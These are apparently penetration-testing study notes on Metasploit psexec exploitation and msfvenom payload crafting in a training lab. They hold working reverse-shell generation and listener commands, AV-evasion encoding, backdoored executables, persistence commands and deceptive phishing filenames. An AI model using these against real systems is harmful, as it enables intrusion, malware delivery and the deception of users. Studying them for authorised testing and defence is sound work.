# Payloads ## Overview Metasploit is an automated attack framework developed by Rapid7 that streamlines the process of exploiting vulnerabilities through the use of pre-built modules. It contains easy-to-use options to exploit vulnerabilities and deliver payloads to gain a shell on a vulnerable system. ## Important Considerations **Training vs. Real-World Usage:** * Some cybersecurity training vendors limit Metasploit usage on lab exams * Most organizations will not limit tool usage on engagements * Understanding tool effects is crucial to avoid destruction in live tests * Responsibility lies with the tester to understand tools, techniques, and methodologies **Metasploit Editions:** * **Community Edition**: Free version used in this documentation * **Metasploit Pro**: Paid edition used by established cybersecurity firms * Metasploit Pro includes additional features for penetration tests, security audits, and social engineering campaigns ## Starting Metasploit ### Launch Metasploit Framework Console ```bash sudo msfconsole ``` **Expected Output:** ``` IIIIII dTb.dTb _.---._ II 4' v 'B .'"".'/|\`.""'. II 6. .P : .' / | \ `. : II 'T;. .;P' '.' / | \ `.' II 'T; ;P' `. / | \ .' IIIIII 'YvP' `-.__|__.-' I love shells --egypt =[ metasploit v6.0.44-dev ] + -- --=[ 2131 exploits - 1139 auxiliary - 363 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 8 evasion ] Metasploit tip: Writing a custom module? After editing your module, why not try the reload command msf6 > ``` ### Key Statistics * **2131 exploits**: Pre-built vulnerability exploits * **592 payloads**: Available payload options * **1139 auxiliary**: Supporting modules for scanning/enumeration * **363 post**: Post-exploitation modules * **45 encoders**: Payload encoding options * **10 nops**: No-operation modules * **8 evasion**: Evasion techniques *Note: These numbers may change as maintainers add/remove modules* ## Practical Example: SMB Exploitation ### Step 1: Target Enumeration **Nmap Scan:** ```bash nmap -sC -sV -Pn 10.129.164.25 ``` **Sample Output:** ``` Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 21:03 UTC Nmap scan report for 10.129.164.25 Host is up (0.020s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) Host script results: |_nbstat: NetBIOS name: nil, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:04:e2 (VMware) | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-09-09T21:03:31 |_ start_date: N/A ``` **Key Findings:** * SMB service on port 445 (potential attack vector) * Windows 7-10 system * SMB message signing disabled (security weakness) ### Step 2: Module Search **Search for SMB modules:** ```bash msf6 > search smb ``` **Sample Output:** ``` Matching Modules ================ # Name Disclosure Date Rank Check Description --- ---- --------------- ---- ----- ----------- 41 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 42 auxiliary/dos/windows/smb/ms05_047_pnp normal No Microsoft Plug and Play Service Registry Overflow 56 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution 60 exploit/windows/smb/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution ``` ### Step 3: Understanding Module Structure **Module: `exploit/windows/smb/psexec`** | Component | Meaning | | ---------- | ------------------------------------------ | | `56` | Module number (relative to search results) | | `exploit/` | Module type (exploit module) | | `windows/` | Target platform (Windows) | | `smb/` | Service/protocol (SMB) | | `psexec` | Tool/technique (psexec utility) | ### Step 4: Module Selection ```bash msf6 > use 56 ``` **Expected Response:** ``` [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/smb/psexec) > ``` **Prompt Breakdown:** * `exploit` - Module type * `windows/smb/psexec` - Specific exploit path * Default payload: `windows/meterpreter/reverse_tcp` ### Step 5: Examining Module Options ```bash msf6 exploit(windows/smb/psexec) > options ``` **Module Options:** ``` Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 445 yes The SMB service port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as ``` **Payload Options:** ``` Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 68.183.42.102 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port ``` ### Step 6: Configuring the Exploit **Required Settings:** ```bash msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.180.71 RHOSTS => 10.129.180.71 msf6 exploit(windows/smb/psexec) > set SHARE ADMIN$ SHARE => ADMIN$ msf6 exploit(windows/smb/psexec) > set SMBPass HTB_@cademy_stdnt! SMBPass => HTB_@cademy_stdnt! msf6 exploit(windows/smb/psexec) > set SMBUser htb-student SMBUser => htb-student msf6 exploit(windows/smb/psexec) > set LHOST 10.10.14.222 LHOST => 10.10.14.222 ``` **Configuration Breakdown:** * **RHOSTS**: Target IP address(es) * **SHARE**: Administrative share (ADMIN$, C$, etc.) * **SMBPass**: Password for authentication * **SMBUser**: Username for authentication * **LHOST**: Local host IP for reverse connection ### Step 7: Executing the Exploit ```bash msf6 exploit(windows/smb/psexec) > exploit ``` **Execution Output:** ``` [*] Started reverse TCP handler on 10.10.14.222:4444 [*] 10.129.180.71:445 - Connecting to the server... [*] 10.129.180.71:445 - Authenticating to 10.129.180.71:445 as user 'htb-student'... [*] 10.129.180.71:445 - Selecting PowerShell target [*] 10.129.180.71:445 - Executing the payload... [+] 10.129.180.71:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175174 bytes) to 10.129.180.71 [*] Meterpreter session 1 opened (10.10.14.222:4444 -> 10.129.180.71:49675) at 2021-09-13 17:43:41 +0000 meterpreter > ``` **Process Breakdown:** 1. **Handler Started**: Reverse TCP handler listening on LHOST:LPORT 2. **Connection**: Connecting to target SMB service 3. **Authentication**: Authenticating with provided credentials 4. **Target Selection**: Selecting PowerShell target 5. **Payload Execution**: Executing the payload on target 6. **Stage Transfer**: Sending Meterpreter stage to target 7. **Session Establishment**: Meterpreter session opened ## Understanding Meterpreter ### What is Meterpreter? Meterpreter is an advanced payload that: * Uses in-memory DLL injection * Establishes stealthy communication channel * Provides extensive post-exploitation capabilities * Operates entirely in memory (difficult to detect) ### Key Capabilities **File Operations:** * Upload/download files * File system navigation * File manipulation **System Operations:** * Execute system commands * Run keylogger * Create/start/stop services * Manage processes **Network Operations:** * Port forwarding * Network pivoting * Route manipulation **Advanced Features:** * Screenshot capture * Webcam access * Audio recording * Registry manipulation ### Meterpreter Commands **Get Help:** ```bash meterpreter > ? ``` **Common Commands:** ```bash # System Information meterpreter > sysinfo meterpreter > getuid meterpreter > getpid # File System meterpreter > pwd meterpreter > ls meterpreter > cd # Process Management meterpreter > ps meterpreter > migrate # Network meterpreter > ipconfig meterpreter > route # Persistence meterpreter > run persistence -X ``` ### Dropping to System Shell **Access Full System Commands:** ```bash meterpreter > shell Process 604 created. Channel 1 created. Microsoft Windows [Version 10.0.18362.1256] (c) 2019 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32> ``` **Return to Meterpreter:** ```bash C:\WINDOWS\system32> exit meterpreter > ``` ## Metasploit Module Types ### 1. Exploit Modules **Purpose**: Exploit specific vulnerabilities **Example**: `exploit/windows/smb/psexec` **Usage**: Gain initial access to systems ### 2. Auxiliary Modules **Purpose**: Scanning, enumeration, and verification **Example**: `auxiliary/scanner/smb/smb_version` **Usage**: Information gathering and reconnaissance ### 3. Post Modules **Purpose**: Post-exploitation activities **Example**: `post/windows/gather/credentials/credential_collector` **Usage**: After gaining access, collect information ### 4. Payload Modules **Purpose**: Code executed on target after exploitation **Example**: `windows/meterpreter/reverse_tcp` **Usage**: Establish communication channel ### 5. Encoder Modules **Purpose**: Encode payloads to avoid detection **Example**: `x86/shikata_ga_nai` **Usage**: Bypass antivirus and filters ### 6. NOP Modules **Purpose**: No-operation instructions for buffer alignment **Example**: `x86/opty2` **Usage**: Ensure payload stability ## MSFVenom - Standalone Payload Generator ### Basic Usage **Generate Windows Reverse Shell:** ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -f exe -o shell.exe ``` **Generate Linux Reverse Shell:** ```bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -f elf -o shell.elf ``` **Generate PHP Web Shell:** ```bash msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -f raw -o shell.php ``` ### Common Parameters | Parameter | Description | Example | | --------- | ------------------- | --------------------------------- | | `-p` | Payload type | `windows/meterpreter/reverse_tcp` | | `-f` | Output format | `exe`, `elf`, `raw`, `python` | | `-o` | Output file | `shell.exe` | | `-e` | Encoder | `x86/shikata_ga_nai` | | `-i` | Encoding iterations | `3` | | `-b` | Bad characters | `\x00\x0a\x0d` | ### Advanced MSFVenom Examples **Encoded Payload:** ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o encoded_shell.exe ``` **Custom Template:** ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -x notepad.exe -f exe -o backdoored_notepad.exe ``` ## Best Practices ### 1. Reconnaissance First * Always perform thorough enumeration * Identify target OS and services * Understand network topology * Gather credentials when possible ### 2. Module Selection * Choose appropriate exploit for target * Consider payload options * Understand module limitations * Test in lab environment first ### 3. Payload Considerations * Select appropriate payload type * Consider network restrictions * Plan for persistence needs * Understand detection risks ### 4. Operational Security * Use common ports when possible * Consider encoding for AV evasion * Clean up artifacts after testing * Document all actions taken ### 5. Session Management * Migrate to stable processes * Create multiple access points * Use appropriate persistence methods * Monitor for detection ## Troubleshooting ### Common Issues **1. Module Not Found:** ```bash msf6 > updatedb msf6 > reload_all ``` **2. Payload Mismatch:** ```bash msf6 exploit(windows/smb/psexec) > show payloads msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp ``` **3. Connection Issues:** ```bash # Check firewall rules # Verify network connectivity # Confirm correct IP addresses ``` **4. Authentication Failures:** ```bash # Verify credentials # Check domain settings # Try different authentication methods ``` ### Debugging Commands **Show Module Information:** ```bash msf6 > info exploit/windows/smb/psexec ``` **Check Payload Options:** ```bash msf6 exploit(windows/smb/psexec) > show options msf6 exploit(windows/smb/psexec) > show payloads ``` **Session Management:** ```bash msf6 > sessions -l msf6 > sessions -i 1 msf6 > sessions -k 1 ``` ## Security Considerations ### Detection Risks **Network Level:** * Unusual network connections * Known malicious signatures * Behavioral analysis triggers **Host Level:** * Process injection detection * In-memory payload signatures * Behavioral monitoring alerts ### Mitigation Strategies **For Penetration Testers:** * Use custom payloads * Implement proper encoding * Time attacks appropriately * Clean up after testing **For Defenders:** * Monitor for known signatures * Implement behavioral analysis * Use application whitelisting * Regular security updates ## Summary Metasploit provides a powerful framework for: * **Automated exploitation** of known vulnerabilities * **Payload delivery** through various attack vectors * **Post-exploitation** activities and persistence * **Comprehensive testing** of security controls Key takeaways: * Understand tools before using them * Proper enumeration guides module selection * Meterpreter provides extensive post-exploitation capabilities * Always consider detection and mitigation strategies * Practice in controlled environments first The combination of Metasploit's exploit modules and payload delivery system makes it an invaluable tool for security professionals, but it requires proper understanding and responsible use to avoid unintended consequences in production environments. ## Crafting Payloads with MSFvenom ### Understanding Payload Delivery Challenges Using automated attacks in Metasploit requires network access to vulnerable target machines. However, there are situations where we lack direct network access to a target. In these cases, we need alternative delivery methods such as: * **Email attachments** with malicious payloads * **Social engineering** to drive user execution * **Physical access** via USB drives during onsite tests * **Web downloads** from compromised or controlled sites MSFvenom addresses these challenges by providing: * **Flexible delivery options** for various scenarios * **Encryption & encoding** to bypass antivirus detection * **Multiple output formats** for different platforms * **Standalone payload generation** without full Metasploit ### Exploring Available Payloads **List all available payloads:** ```bash msfvenom -l payloads ``` **Sample Output:** ``` Framework Payloads (592 total) [--payload ] ================================================== Name Description ---- ----------- linux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). Connect back to the attacker linux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker linux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/zarch/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless) windows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection (Windows x86) windows/dllinject/reverse_tcp Inject a DLL via a reflective loader. Connect back to the attacker nodejs/shell_bind_tcp Creates an interactive shell via nodejs nodejs/shell_reverse_tcp Creates an interactive shell via nodejs ``` ### Staged vs. Stageless Payloads #### Staged Payloads **Characteristics:** * Create a way to send more components of the attack * "Setting the stage" for additional functionality * Send small initial stage, then download remainder over network * Requires multiple network communications **Example:** `linux/x86/shell/reverse_tcp` * Initial stage executed on target * Calls back to attack box for remainder * Downloads and executes shellcode * Establishes reverse shell connection **Advantages:** * Smaller initial payload size * Can deliver larger, more complex payloads * Flexibility in payload composition **Disadvantages:** * Multiple network communications required * Dependent on network stability * Takes up memory space for stages * More detectable due to network traffic #### Stageless Payloads **Characteristics:** * Complete payload sent in its entirety * No additional network communications required * Self-contained executable code * Single network transmission **Example:** `linux/zarch/meterpreter_reverse_tcp` * Complete payload in one transmission * No additional downloads required * Executes immediately upon receipt **Advantages:** * Better for bandwidth-limited environments * Reduced network traffic (better evasion) * No dependency on network stability * Faster execution **Disadvantages:** * Larger payload size * Limited by single transmission constraints * Less flexibility in payload composition ### Identifying Staged vs. Stageless Payloads #### Naming Convention Rules **Staged Payloads:** * Each `/` represents a stage * Example: `linux/x86/shell/reverse_tcp` * `/shell/` = stage to send * `/reverse_tcp` = another stage **Stageless Payloads:** * All components in single function name * Example: `linux/zarch/meterpreter_reverse_tcp` * `meterpreter_reverse_tcp` = complete payload #### Comparison Examples | Staged | Stageless | | --------------------------------- | --------------------------------- | | `windows/meterpreter/reverse_tcp` | `windows/meterpreter_reverse_tcp` | | `linux/x86/shell/reverse_tcp` | `linux/x86/shell_reverse_tcp` | | `windows/shell/bind_tcp` | `windows/shell_bind_tcp` | ### Building Stageless Payloads #### Linux ELF Payload Example **Command:** ```bash msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf ``` **Output:** ``` [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 74 bytes Final size of elf file: 194 bytes ``` **Command Breakdown:** | Component | Description | | ----------------------------- | ------------------------------------ | | `msfvenom` | Tool used to create the payload | | `-p` | Indicates creating a payload | | `linux/x64/shell_reverse_tcp` | Linux 64-bit stageless reverse shell | | `LHOST=10.10.14.113` | IP address to connect back to | | `LPORT=443` | Port to connect back to | | `-f elf` | Output format (ELF binary) | | `> createbackup.elf` | Output filename | #### Windows EXE Payload Example **Command:** ```bash msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe ``` **Output:** ``` [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes ``` ### Payload Delivery Methods #### 1. Email Attachments **Advantages:** * Direct user interaction * Can target specific individuals * Bypasses network perimeter controls **Considerations:** * Email security filters * User awareness training * Antivirus scanning #### 2. Web Downloads **Advantages:** * Wide distribution potential * Can be combined with social engineering * Multiple delivery vectors **Considerations:** * Web application firewalls * Browser security features * User download behavior #### 3. Physical Media **Advantages:** * Bypasses network controls * High success rate if executed * Direct access to target environment **Considerations:** * Physical security controls * Autorun policies * User education #### 4. Combined with Exploits **Advantages:** * Automated delivery * Leverages existing vulnerabilities * Part of broader attack chain **Considerations:** * Requires network access * Depends on vulnerability existence * May be detected by security tools ### Executing Payloads #### Linux Payload Execution **Setup listener:** ```bash sudo nc -lvnp 443 ``` **When payload executes:** ```bash sudo nc -lvnp 443 Listening on 0.0.0.0 443 Connection received on 10.129.138.85 60892 env PWD=/home/htb-student/Downloads cd .. ls Desktop Documents Downloads Music Pictures Public Templates Videos ``` #### Windows Payload Execution **Setup listener:** ```bash sudo nc -lvnp 443 ``` **When payload executes:** ```bash sudo nc -lvnp 443 Listening on 0.0.0.0 443 Connection received on 10.129.144.5 49679 Microsoft Windows [Version 10.0.18362.1256] (c) 2019 Microsoft Corporation. All rights reserved. C:\Users\htb-student\Downloads>dir dir Volume in drive C has no label. Volume Serial Number is DD25-26EB Directory of C:\Users\htb-student\Downloads 09/23/2021 10:26 AM . 09/23/2021 10:26 AM .. 09/23/2021 10:26 AM 73,802 BonusCompensationPlanpdf.exe 1 File(s) 73,802 bytes 2 Dir(s) 9,997,516,800 bytes free ``` ### Advanced MSFvenom Techniques #### Multiple Format Support **Common formats:** ```bash # Windows formats -f exe # Windows executable -f dll # Windows DLL -f msi # Windows installer -f aspx # ASP.NET web application -f aspx-exe # ASP.NET executable # Linux formats -f elf # Linux executable -f elf-so # Linux shared object # Cross-platform formats -f jar # Java archive -f war # Web application archive -f python # Python script -f powershell # PowerShell script -f bash # Bash script ``` #### Encoding for Evasion **Basic encoding:** ```bash msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -e x86/shikata_ga_nai -f exe > encoded_payload.exe ``` **Multiple encoding iterations:** ```bash msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -e x86/shikata_ga_nai -i 3 -f exe > multi_encoded.exe ``` #### Template Injection **Inject into existing executable:** ```bash msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -x notepad.exe -f exe > backdoored_notepad.exe ``` #### Bad Character Removal **Remove problematic characters:** ```bash msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -b '\x00\x0a\x0d' -f exe > clean_payload.exe ``` ### Platform-Specific Considerations #### Windows Considerations **Antivirus Evasion:** * Use encoders and encryption * Template injection techniques * Fileless payload delivery * Process hollowing techniques **Execution Methods:** * Double-click execution * Command line execution * Scheduled tasks * Service installation #### Linux Considerations **Permission Requirements:** * Executable permissions needed * User context considerations * Privilege escalation needs **Execution Methods:** * Direct execution * Bash/shell execution * Cron job scheduling * Service daemon installation ### Social Engineering Integration #### Filename Strategies **Convincing Filenames:** * `BonusCompensationPlan.pdf.exe` * `SecurityUpdate.exe` * `InstallationWizard.exe` * `DocumentViewer.exe` **File Extension Manipulation:** * Use double extensions * Hide real extension * Use similar-looking extensions * Leverage file association weaknesses #### Delivery Context **Business Context:** * Quarterly reports * Security updates * Software installations * Training materials **Personal Context:** * Photos/videos * Games/entertainment * Personal documents * Utilities/tools ### Detection and Countermeasures #### Common Detection Methods **Signature-based Detection:** * Known payload signatures * Behavioral pattern matching * Heuristic analysis **Behavioral Analysis:** * Network communication patterns * Process execution behavior * File system modifications #### Evasion Techniques **Payload Modification:** * Custom encoding schemes * Polymorphic payloads * Encrypted communications * Delayed execution **Delivery Modification:** * Staged delivery * Legitimate application abuse * Living-off-the-land techniques * Memory-only execution ### MSFvenom Best Practices #### Payload Selection 1. **Choose appropriate payload type** (staged vs stageless) 2. **Consider target platform** and architecture 3. **Evaluate network restrictions** and firewall rules 4. **Plan for persistence** and post-exploitation needs #### Delivery Planning 1. **Understand target environment** and security controls 2. **Plan social engineering context** and delivery method 3. **Prepare backup delivery methods** in case of failure 4. **Consider detection timing** and operational security #### Operational Security 1. **Use common ports** for better success rates 2. **Implement proper encoding** for AV evasion 3. **Clean up artifacts** after successful execution 4. **Monitor for detection** and adjust accordingly ### Troubleshooting MSFvenom #### Common Issues **Payload Size Limitations:** ```bash # Check payload size msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 --smallest ``` **Architecture Mismatches:** ```bash # Specify architecture explicitly msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > payload64.exe ``` **Encoding Failures:** ```bash # Try different encoders msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -e x86/alpha_mixed -f exe > alpha_encoded.exe ``` #### Verification Methods **Test payload functionality:** ```bash # Check payload structure file payload.exe strings payload.exe # Test in isolated environment # Verify listener connectivity # Confirm execution behavior ``` ### Integration with Other Tools #### Combining with Social Engineering **Social Engineering Toolkit (SET):** * Automated payload delivery * Credential harvesting * Phishing campaigns **Custom Scripts:** * Automated payload generation * Batch processing * Custom encoding schemes #### Post-Exploitation Integration **Meterpreter Migration:** ```bash # After payload execution meterpreter > ps meterpreter > migrate ``` **Persistence Establishment:** ```bash # Create persistent access meterpreter > run persistence -X -i 10 -p 443 -r 10.10.14.113 ``` This comprehensive coverage of MSFvenom payload crafting provides the foundation for understanding both the technical aspects and practical applications of standalone payload generation in penetration testing scenarios. ## Advanced Meterpreter Techniques For detailed post-exploitation techniques, advanced commands, and comprehensive Meterpreter usage, see the dedicated [Meterpreter Post-Exploitation Guide](https://github.com/kabaneridev/oscp-notes/blob/main/CPTS-PREP/shells-payloads/meterpreter.md).